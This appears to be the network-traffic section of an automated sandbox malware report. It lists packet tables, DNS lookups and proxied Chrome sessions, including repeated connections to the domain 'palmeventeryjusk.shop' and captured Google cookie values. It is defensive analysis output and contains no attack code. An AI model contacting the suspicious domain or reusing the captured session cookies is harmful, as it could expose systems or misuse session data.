Apr 27, 2024 13:26:32.084255934 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:32.128159046 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:34.291620970 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:34.291712046 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:34.291763067 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:34.291904926 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:34.291920900 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:53.939943075 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:53.939975023 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:53.940035105 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:53.940352917 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:53.940365076 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.250576019 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.250643015 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:54.252068996 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:54.252075911 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.252413034 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.259740114 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:54.304115057 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.547151089 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.547178030 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.547207117 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.547240973 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:54.547249079 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.547280073 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:54.547306061 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:54.547337055 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.547375917 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.547386885 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:54.547391891 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.547429085 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:54.547432899 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.547442913 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.547486067 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:54.552809000 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:54.552818060 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:54.552844048 CEST	49760	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:54.552848101 CEST	443	49760	20.12.23.50	192.168.2.4
Apr 27, 2024 13:27:04.739649057 CEST	49762	443	192.168.2.4	142.250.80.100
Apr 27, 2024 13:27:04.739707947 CEST	443	49762	142.250.80.100	192.168.2.4
Apr 27, 2024 13:27:04.739782095 CEST	49762	443	192.168.2.4	142.250.80.100
Apr 27, 2024 13:27:04.740008116 CEST	49762	443	192.168.2.4	142.250.80.100
Apr 27, 2024 13:27:04.740022898 CEST	443	49762	142.250.80.100	192.168.2.4
Apr 27, 2024 13:27:04.997128010 CEST	443	49762	142.250.80.100	192.168.2.4
Apr 27, 2024 13:27:04.997486115 CEST	49762	443	192.168.2.4	142.250.80.100
Apr 27, 2024 13:27:04.997515917 CEST	443	49762	142.250.80.100	192.168.2.4
Apr 27, 2024 13:27:04.998382092 CEST	443	49762	142.250.80.100	192.168.2.4
Apr 27, 2024 13:27:04.998447895 CEST	49762	443	192.168.2.4	142.250.80.100
Apr 27, 2024 13:27:05.007551908 CEST	49762	443	192.168.2.4	142.250.80.100
Apr 27, 2024 13:27:05.007606983 CEST	443	49762	142.250.80.100	192.168.2.4
Apr 27, 2024 13:27:05.059920073 CEST	49762	443	192.168.2.4	142.250.80.100
Apr 27, 2024 13:27:05.059931040 CEST	443	49762	142.250.80.100	192.168.2.4
Apr 27, 2024 13:27:05.105917931 CEST	49762	443	192.168.2.4	142.250.80.100
Apr 27, 2024 13:27:08.895874977 CEST	49723	80	192.168.2.4	199.232.210.172
Apr 27, 2024 13:27:08.896028996 CEST	49724	80	192.168.2.4	199.232.210.172
Apr 27, 2024 13:27:08.982978106 CEST	80	49723	199.232.210.172	192.168.2.4
Apr 27, 2024 13:27:08.983072042 CEST	80	49724	199.232.210.172	192.168.2.4
Apr 27, 2024 13:27:08.983108997 CEST	80	49723	199.232.210.172	192.168.2.4
Apr 27, 2024 13:27:08.983143091 CEST	80	49724	199.232.210.172	192.168.2.4
Apr 27, 2024 13:27:08.983263016 CEST	49723	80	192.168.2.4	199.232.210.172
Apr 27, 2024 13:27:08.983273983 CEST	49724	80	192.168.2.4	199.232.210.172
Apr 27, 2024 13:27:15.027540922 CEST	443	49762	142.250.80.100	192.168.2.4
Apr 27, 2024 13:27:15.027602911 CEST	443	49762	142.250.80.100	192.168.2.4
Apr 27, 2024 13:27:15.027661085 CEST	49762	443	192.168.2.4	142.250.80.100
Apr 27, 2024 13:27:17.234832048 CEST	49762	443	192.168.2.4	142.250.80.100
Apr 27, 2024 13:27:17.234862089 CEST	443	49762	142.250.80.100	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 27, 2024 13:26:00.628803968 CEST	53	59867	1.1.1.1	192.168.2.4
Apr 27, 2024 13:26:00.637655020 CEST	53	54787	1.1.1.1	192.168.2.4
Apr 27, 2024 13:26:00.669126987 CEST	56952	53	192.168.2.4	8.8.8.8
Apr 27, 2024 13:26:00.670176029 CEST	65252	53	192.168.2.4	1.1.1.1
Apr 27, 2024 13:26:00.758431911 CEST	53	65252	1.1.1.1	192.168.2.4
Apr 27, 2024 13:26:00.762217045 CEST	53	56952	8.8.8.8	192.168.2.4
Apr 27, 2024 13:26:03.013057947 CEST	53	51907	1.1.1.1	192.168.2.4
Apr 27, 2024 13:26:03.263155937 CEST	52041	53	192.168.2.4	1.1.1.1
Apr 27, 2024 13:26:03.263290882 CEST	61763	53	192.168.2.4	1.1.1.1
Apr 27, 2024 13:26:03.353068113 CEST	53	61763	1.1.1.1	192.168.2.4
Apr 27, 2024 13:26:03.353280067 CEST	53	52041	1.1.1.1	192.168.2.4
Apr 27, 2024 13:26:21.140412092 CEST	138	138	192.168.2.4	192.168.2.255
Apr 27, 2024 13:26:21.768251896 CEST	53	55188	1.1.1.1	192.168.2.4
Apr 27, 2024 13:26:23.272723913 CEST	65136	53	192.168.2.4	1.1.1.1
Apr 27, 2024 13:26:23.369961023 CEST	53	65136	1.1.1.1	192.168.2.4
Apr 27, 2024 13:26:30.487952948 CEST	53	51914	1.1.1.1	192.168.2.4
Apr 27, 2024 13:26:36.893527985 CEST	54027	53	192.168.2.4	1.1.1.1
Apr 27, 2024 13:26:36.989690065 CEST	53	54027	1.1.1.1	192.168.2.4
Apr 27, 2024 13:26:45.947042942 CEST	53	63873	1.1.1.1	192.168.2.4
Apr 27, 2024 13:27:00.193162918 CEST	53	65450	1.1.1.1	192.168.2.4
Apr 27, 2024 13:27:00.927077055 CEST	60371	53	192.168.2.4	1.1.1.1
Apr 27, 2024 13:27:01.017467976 CEST	53	60371	1.1.1.1	192.168.2.4
Apr 27, 2024 13:27:04.649708033 CEST	56663	53	192.168.2.4	1.1.1.1
Apr 27, 2024 13:27:04.650015116 CEST	55939	53	192.168.2.4	1.1.1.1
Apr 27, 2024 13:27:04.737871885 CEST	53	56663	1.1.1.1	192.168.2.4
Apr 27, 2024 13:27:04.738251925 CEST	53	55939	1.1.1.1	192.168.2.4
Apr 27, 2024 13:27:17.324198008 CEST	53	56762	1.1.1.1	192.168.2.4
Apr 27, 2024 13:27:32.334367990 CEST	60308	53	192.168.2.4	1.1.1.1
Apr 27, 2024 13:27:32.430865049 CEST	53	60308	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 27, 2024 13:26:00.669126987 CEST	192.168.2.4	8.8.8.8	0xe761	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:26:00.670176029 CEST	192.168.2.4	1.1.1.1	0x4bd0	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:26:03.263155937 CEST	192.168.2.4	1.1.1.1	0x6c23	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:26:03.263290882 CEST	192.168.2.4	1.1.1.1	0xe1a6	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 27, 2024 13:26:23.272723913 CEST	192.168.2.4	1.1.1.1	0xc577	Standard query (0)	palmeventeryjusk.shop	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:26:36.893527985 CEST	192.168.2.4	1.1.1.1	0x2a1e	Standard query (0)	palmeventeryjusk.shop	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:27:00.927077055 CEST	192.168.2.4	1.1.1.1	0x87e9	Standard query (0)	palmeventeryjusk.shop	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:27:04.649708033 CEST	192.168.2.4	1.1.1.1	0xdb52	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:27:04.650015116 CEST	192.168.2.4	1.1.1.1	0x694d	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 27, 2024 13:27:32.334367990 CEST	192.168.2.4	1.1.1.1	0xb2c5	Standard query (0)	palmeventeryjusk.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 27, 2024 13:26:00.758431911 CEST	1.1.1.1	192.168.2.4	0x4bd0	No error (0)	google.com	142.250.80.14	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:26:00.762217045 CEST	8.8.8.8	192.168.2.4	0xe761	No error (0)	google.com	142.251.40.142	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:26:03.353068113 CEST	1.1.1.1	192.168.2.4	0xe1a6	No error (0)	www.google.com		65	IN (0x0001)	false
Apr 27, 2024 13:26:03.353280067 CEST	1.1.1.1	192.168.2.4	0x6c23	No error (0)	www.google.com	142.251.32.100	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:26:23.369961023 CEST	1.1.1.1	192.168.2.4	0xc577	No error (0)	palmeventeryjusk.shop	172.67.155.93	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:26:23.369961023 CEST	1.1.1.1	192.168.2.4	0xc577	No error (0)	palmeventeryjusk.shop	104.21.7.13	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:26:36.989690065 CEST	1.1.1.1	192.168.2.4	0x2a1e	No error (0)	palmeventeryjusk.shop	172.67.155.93	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:26:36.989690065 CEST	1.1.1.1	192.168.2.4	0x2a1e	No error (0)	palmeventeryjusk.shop	104.21.7.13	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:27:01.017467976 CEST	1.1.1.1	192.168.2.4	0x87e9	No error (0)	palmeventeryjusk.shop	172.67.155.93	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:27:01.017467976 CEST	1.1.1.1	192.168.2.4	0x87e9	No error (0)	palmeventeryjusk.shop	104.21.7.13	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:27:04.737871885 CEST	1.1.1.1	192.168.2.4	0xdb52	No error (0)	www.google.com	142.250.80.100	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:27:04.738251925 CEST	1.1.1.1	192.168.2.4	0x694d	No error (0)	www.google.com		65	IN (0x0001)	false
Apr 27, 2024 13:27:32.430865049 CEST	1.1.1.1	192.168.2.4	0xb2c5	No error (0)	palmeventeryjusk.shop	104.21.7.13	A (IP address)	IN (0x0001)	false
Apr 27, 2024 13:27:32.430865049 CEST	1.1.1.1	192.168.2.4	0xb2c5	No error (0)	palmeventeryjusk.shop	172.67.155.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.google.com

fs.microsoft.com

slscr.update.microsoft.com

palmeventeryjusk.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	142.251.32.100	443	7008	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:03 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-27 11:26:04 UTC	1815	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgSaEMC5GMvBs7EGIjBUDjoZOZwbbYOebWZ9rjzg1pIVUtCKWFvTZJyTatG-di6-kWgVSkMk4x6uhc1VAKAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsIzMGzsQYQ2qa7FxIEmhDAuQ Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Sat, 27 Apr 2024 11:26:04 GMT Server: gws Content-Length: 427 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-27-11; expires=Mon, 27-May-2024 11:26:04 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=E5rhLSrnbfjRk46_dmtGnUqwPwi-mNxfINfN4owhq0ItG93yjm74EKSIboI2GbuuZy2nkvdCUEBUYg9CSinzaNpIviyv4g-zdR9EY5_nU28-231-CAbpyAdj6-Jj6y42jgmw20hQDtRudT_bcPFZ3vPv54iVARp7w4xpHjz1GVI; expires=Sun, 27-Oct-2024 11:26:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-27 11:26:04 UTC	427	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	142.251.32.100	443	7008	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:03 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-27 11:26:04 UTC	1842	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgSaEMC5GMvBs7EGIjCXTsQ7Hz4Kgfi-FiRAT51_6pwZM6lLrAZbawdcw8AX8hoRf91oiReOlMqAgZsqCfUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsIzMGzsQYQ0ouSVRIEmhDAuQ Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Sat, 27 Apr 2024 11:26:04 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-27-11; expires=Mon, 27-May-2024 11:26:04 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=kQC6D8SRkrtcp-Ak6hN6139KekVx3zhnDsBO5DsiJ9YDbwqMQ-N6a3Hqkivy0PHw9-eJ3x5r-5xCo2gnEOvmH3O-kQW_B1fyt7z_Em-HG3Cqp_wm97L3ppdQcG3KIgiluTIZwHftN_crK6YXUFLhYGNC9lJOV9dEbrQYPTrEHbs; expires=Sun, 27-Oct-2024 11:26:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-27 11:26:04 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	142.251.32.100	443	7008	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:03 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-27 11:26:04 UTC	1761	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMC5GMvBs7EGIjA2UZwTDI9cbxIwnZske8EIQMZhE-XvCbuuLKQiNeKFWQoRwO1bxpkt2MlsnyAfg3kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIzMGzsQYQwbOB2gESBJoQwLk Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Sat, 27 Apr 2024 11:26:04 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-27-11; expires=Mon, 27-May-2024 11:26:04 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=N_zXEKVcGFSmGJnnf9NfxUQYajfRVtbCJ2yy8YIqZG0n-IE-5-6CcuJsdzHS69fS5Lo6qU6l4YiUp_b7kTJjGJdJDpCMMHkYMxbQvY6bAP4YLsOZcW5Y3kKcK6142ycJULOhE9dA5VMjK3BqAAFXra6F2xBdQGomvF0oNwd5oGw; expires=Sun, 27-Oct-2024 11:26:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-27 11:26:04 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	142.251.32.100	443	7008	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:04 UTC	742	OUT	GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgSaEMC5GMvBs7EGIjBUDjoZOZwbbYOebWZ9rjzg1pIVUtCKWFvTZJyTatG-di6-kWgVSkMk4x6uhc1VAKAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-27-11; NID=513=E5rhLSrnbfjRk46_dmtGnUqwPwi-mNxfINfN4owhq0ItG93yjm74EKSIboI2GbuuZy2nkvdCUEBUYg9CSinzaNpIviyv4g-zdR9EY5_nU28-231-CAbpyAdj6-Jj6y42jgmw20hQDtRudT_bcPFZ3vPv54iVARp7w4xpHjz1GVI
2024-04-27 11:26:04 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Sat, 27 Apr 2024 11:26:04 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3131 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
